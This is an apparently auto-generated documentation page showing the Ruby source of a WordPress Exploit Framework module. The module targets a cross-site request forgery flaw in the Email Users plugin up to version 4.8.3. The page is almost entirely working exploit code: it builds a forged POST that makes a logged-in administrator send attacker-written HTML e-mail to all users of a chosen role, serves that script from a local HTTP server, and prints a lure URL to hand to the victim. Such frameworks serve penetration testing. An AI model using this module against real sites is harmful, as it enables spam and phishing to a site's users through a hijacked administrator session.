class Wpxf::Auxiliary::EmailUsersCsrfBulkMail

Public Class Methods

new() click to toggle source
# File lib/wpxf/modules/auxiliary/misc/email_users_csrf_bulk_mail.rb, line 6
def initialize
  super

  update_info(
    name: 'Email Users <= 4.8.3 CSRF Bulk Mail',
    desc: 'This module exploits a lack of CSRF protection in versions <= 4.8.3 of '\
          'the Email Users plugin, which allows for the sending of a bulk e-mail to '\
          'all users of a specified role.',
    author: [
      'Julien Rentrop', # Disclosure
      'rastating'       # WPXF module
    ],
    references: [
      ['WPVDB', '8601'],
      ['URL', 'https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_vulnerability_in_email_users_wordpress_plugin.html']
    ],
    date: 'Aug 15 2016'
  )

  register_options([
    StringOption.new(
      name: 'user_role',
      desc: 'The role of the users to send the e-mail to',
      default: 'Subscriber',
      required: true
    ),
    StringOption.new(
      name: 'email_body',
      desc: 'The HTML body of the e-mail to send',
      required: true
    ),
    StringOption.new(
      name: 'email_subject',
      desc: 'The subject of the e-mail to send',
      required: true
    )
  ])
end

Public Instance Methods

check() click to toggle source
# File lib/wpxf/modules/auxiliary/misc/email_users_csrf_bulk_mail.rb, line 45
def check
  check_plugin_version_from_readme('email-users', '4.8.4')
end
initial_script() click to toggle source
# File lib/wpxf/modules/auxiliary/misc/email_users_csrf_bulk_mail.rb, line 64
def initial_script
  create_basic_post_script(
    vulnerable_url,
    'send' => 'true',
    'fromName' => '',
    'fromAddress' => '',
    'group_mode' => 'role',
    'mail_format' => 'html',
    'send_targets[]' => user_role,
    'subject' => datastore['email_subject'],
    'mailcontent' => datastore['email_body']
  )
end
on_http_request(path, _params, _headers) click to toggle source
# File lib/wpxf/modules/auxiliary/misc/email_users_csrf_bulk_mail.rb, line 53
def on_http_request(path, _params, _headers)
  return '' unless path.eql? normalize_uri(xss_path, initial_req_path)
  emit_info 'Serving CSRF script to victim...'
  stop_http_server
  { type: 'text/html', body: initial_script }
end
run() click to toggle source
Calls superclass method Wpxf::WordPress::StagedReflectedXss#run
# File lib/wpxf/modules/auxiliary/misc/email_users_csrf_bulk_mail.rb, line 78
def run
  return false unless super

  emit_info 'Provide the URL below to the victim to send the bulk e-mail'
  puts
  puts url_with_xss
  puts

  start_http_server
  true
end
user_role() click to toggle source
# File lib/wpxf/modules/auxiliary/misc/email_users_csrf_bulk_mail.rb, line 49
def user_role
  "role-#{datastore['user_role'].downcase}"
end
vulnerable_url() click to toggle source
# File lib/wpxf/modules/auxiliary/misc/email_users_csrf_bulk_mail.rb, line 60
def vulnerable_url
  normalize_uri(wordpress_url_admin, 'admin.php?page=mailusers-send-to-group-page')
end